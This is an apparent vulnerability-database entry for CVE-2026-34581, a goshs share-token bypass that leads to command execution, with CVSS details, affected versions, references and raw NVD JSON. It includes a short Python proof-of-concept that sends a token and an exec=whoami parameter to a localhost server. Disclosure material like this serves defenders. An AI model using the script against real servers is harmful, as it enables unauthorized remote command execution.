Security Vulnerability Report
CVE-2026-34581 CVSS 8.1 HIGH

CVE-2026-34581

Published: 2026-04-02 19:21:32
Last Modified: 2026-04-15 17:38:30

Description

goshs is a SimpleHTTPServer written in Go. In versions from 1.1.0 up to, but not including, 2.0.0-beta.2, a Share Token that is meant to grant only a limited download of selected files can be used to reach all of the goshs functionality, including command execution. This issue has been patched in version 2.0.0-beta.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:goshs:goshs:*:*:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:goshs:goshs:2.0.0:beta1:*:*:*:go:*:* - VULNERABLE
goshs 1.1.0
goshs versions before 2.0.0-beta.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit(target_url, share_token):
    """
    PoC for CVE-2026-34581
    Demonstrates bypassing Share Token restrictions to achieve RCE.
    """
    # Target endpoint using the share token
    # The exploit bypasses the file restriction to access exec features
    exploit_url = f"{target_url}/?token={share_token}&exec=whoami"
    try:
        response = requests.get(exploit_url)
        if response.status_code == 200:
            print("[+] Exploit successful! Command output:")
            print(response.text)
        else:
            print("[-] Exploit failed.")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    target = "http://127.0.0.1:8000"
    token = "VULNERABLE_TOKEN_ID"
    exploit(target, token)

References

https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216 (Patch)
https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2 (Product, Release Notes)
https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34581",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-02T19:21:32.157",
    "lastModified": "2026-04-15T17:38:30.217",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "goshs is a SimpleHTTPServer written in Go. From version 1.1.0 to before version 2.0.0-beta.2, when using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec. This issue has been patched in version 2.0.0-beta.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-288"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:goshs:goshs:*:*:*:*:*:go:*:*",
                "versionStartIncluding": "1.1.0",
                "versionEndExcluding": "2.0.0",
                "matchCriteriaId": "EE028980-59D0-49E3-81A8-BB9E32D3FC9F"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta1:*:*:*:go:*:*",
                "matchCriteriaId": "047ECFC3-056F-4FAC-9B64-5F7C120CFFE1"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}